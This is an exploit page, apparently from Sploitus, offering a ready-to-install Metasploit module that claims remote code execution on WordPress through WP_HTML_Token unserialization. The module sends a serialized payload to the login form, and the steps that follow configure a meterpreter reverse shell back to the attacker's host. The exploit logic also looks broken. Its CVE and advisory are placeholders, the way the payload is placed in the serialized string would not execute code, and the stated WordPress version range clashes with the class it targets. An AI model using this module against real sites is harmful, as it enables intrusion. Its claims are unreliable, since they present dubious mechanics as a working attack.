Share
## https://sploitus.com/exploit?id=9B4CDCBD-945B-52C4-AC76-5135772CE450
To create a Metasploit module that exploits the RCE vulnerability in WordPress via the unserialization of instances of the `WP_HTML_Token` class, we'll focus on crafting a payload that triggers the unserialization flaw, leading to arbitrary code execution.

### Metasploit Module

Save the following code as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP_HTML_Token Unserialization RCE',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in WordPress via
        the unserialization of instances of the `WP_HTML_Token` class. This allows for
        code execution via its `__destruct()` magic method.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-XXXX'],  # Replace with the correct CVE number
          ['URL', 'https://example.com/advisory']  # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [
        ['WordPress <= 5.x', { }]
      ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x00",
        }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'wp-login.php'),
    })

    if res && res.code == 200 && res.body.include?('wp-login.php')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending payload to trigger unserialization vulnerability")

    serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'

    post_data = {
      'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
      'user_pass'  => serialized_payload,
      'wp-submit'  => 'Log In',
      'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
      'testcookie' => 1
    }

    send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-login.php'),
      'vars_post' => post_data
    })

    handler
  end
end
```

### Usage Instructions

1. **Save the Module**:
   Save the module as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.

   ```bash
   /path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
   ```

2. **Load Metasploit**:
   Start Metasploit Framework by opening a terminal and running:

   ```bash
   msfconsole
   ```

3. **Use the New Module**:
   In the Metasploit console, load the new exploit module using the following command:

   ```bash
   use exploit/multi/http/wordpress_wp_html_token_rce
   ```

4. **Configure and Run**:
   Set the necessary options, such as `RHOSTS`, `RPORT`, `TARGETURI`, and `PAYLOAD`. Then run the module.

   ```bash
   msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
   RHOSTS => target_ip
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
   TARGETURI => /
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
   PAYLOAD => php/meterpreter/reverse_tcp
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
   LHOST => your_ip
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
   LPORT => 4444
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
   ```

### Important Considerations

- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.

This Metasploit module sends a crafted serialized payload to a vulnerable WordPress instance, attempting to trigger the unserialization vulnerability and achieve arbitrary code execution. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.